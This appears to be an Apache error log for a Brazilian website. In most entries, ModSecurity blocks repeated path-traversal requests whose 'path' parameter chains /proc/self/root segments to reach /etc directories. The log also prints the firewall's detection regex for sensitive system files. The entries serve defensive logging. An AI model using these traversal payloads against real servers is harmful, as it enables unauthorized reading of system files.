[Wed Mar 18 02:54:32.690015 2026] [:error] [pid 11816:tid 140411641214720] [client 74.7.241.31:44934] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo-GOw_le52K8_3pV2YSwAAAgw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 02:54:34.271543 2026] [:error] [pid 30077:tid 140411666392832] [client 74.7.241.31:44942] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo-Gvu8EFLIOrSqIpvAOgAAAkk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 02:54:34.787043 2026] [:error] [pid 26799:tid 140411641214720] [client 74.7.243.128:47418] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo-Gta6ubjKNq_cu4ZOUQAAA0w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 02:54:35.797504 2026] [:error] [pid 11816:tid 140411540502272] [client 74.7.241.31:44952] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo-G-w_le52K8_3pV2YUAAAAhg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 02:54:37.503782 2026] [:error] [pid 29882:tid 140411641214720] [client 74.7.241.31:55214] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo-HUzinOy1jxa1j4fKUAAAAQw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 02:54:39.074624 2026] [:error] [pid 29882:tid 140411666392832] [client 74.7.241.31:55224] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo-H0zinOy1jxa1j4fKUwAAAQk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 02:54:40.626660 2026] [:error] [pid 19507:tid 140411599251200] [client 74.7.241.31:55234] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo-INY0UrI5A3LftIxIQgAAAZE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 02:54:42.157622 2026] [:error] [pid 19507:tid 140411540502272] [client 74.7.241.31:55246] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo-ItY0UrI5A3LftIxIQwAAAZg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 02:54:53.142011 2026] [proxy_fcgi:error] [pid 11816:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:55010] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:54:55.253957 2026] [:error] [pid 31803:tid 140411599251200] [client 74.7.241.31:34032] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo-L-yqAr6etmhZHNpwugAAAFE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 02:54:56.800002 2026] [:error] [pid 30077:tid 140411716749056] [client 74.7.241.31:34046] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo-MPu8EFLIOrSqIpvAPwAAAkM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 02:54:58.433254 2026] [:error] [pid 29882:tid 140411540502272] [client 74.7.241.31:53180] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo-MkzinOy1jxa1j4fKYQAAARg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 02:54:59.620338 2026] [:error] [pid 29882:tid 140411733534464] [client 74.7.241.31:53180] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo-M0zinOy1jxa1j4fKYwAAAQE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 02:55:01.276365 2026] [:error] [pid 29882:tid 140411708356352] [client 74.7.241.31:53180] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo-NUzinOy1jxa1j4fKZgAAAQQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 02:55:02.828232 2026] [:error] [pid 29882:tid 140411725141760] [client 74.7.241.31:53180] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo-NkzinOy1jxa1j4fKZwAAAQI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 02:55:04.406668 2026] [:error] [pid 29882:tid 140411557287680] [client 74.7.241.31:53180] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo-OEzinOy1jxa1j4fKaQAAARY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 02:55:04.772403 2026] [:error] [pid 29882:tid 140411548894976] [client 74.7.243.128:36524] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo-OEzinOy1jxa1j4fKagAAARc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 02:55:06.310266 2026] [:error] [pid 29882:tid 140411582465792] [client 74.7.241.31:53190] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo-OkzinOy1jxa1j4fKbAAAARM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 02:55:07.063369 2026] [:error] [pid 26799:tid 140411699963648] [client 74.7.243.128:59994] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo-O9a6ubjKNq_cu4ZOWwAAA0U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 02:55:07.943549 2026] [:error] [pid 17887:tid 140411548894976] [client 74.7.241.31:45018] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo-OwkwaGbbGflqUZDLygAAANc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 02:55:15.129811 2026] [proxy_fcgi:error] [pid 17653:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:55254] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:55:15.850747 2026] [:error] [pid 15051:tid 140411607643904] [client 74.7.243.128:60010] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo-QymAPhZkrhU8w4knIwAAAJA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 02:55:37.030134 2026] [proxy_fcgi:error] [pid 15826:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:55466] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:55:42.219509 2026] [:error] [pid 30077:tid 140411599251200] [client 74.7.243.128:53130] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo-Xvu8EFLIOrSqIpvAUQAAAlE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 02:56:00.128121 2026] [proxy_fcgi:error] [pid 11816:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:55710] AH01075: Error dispatching request to : (polling)
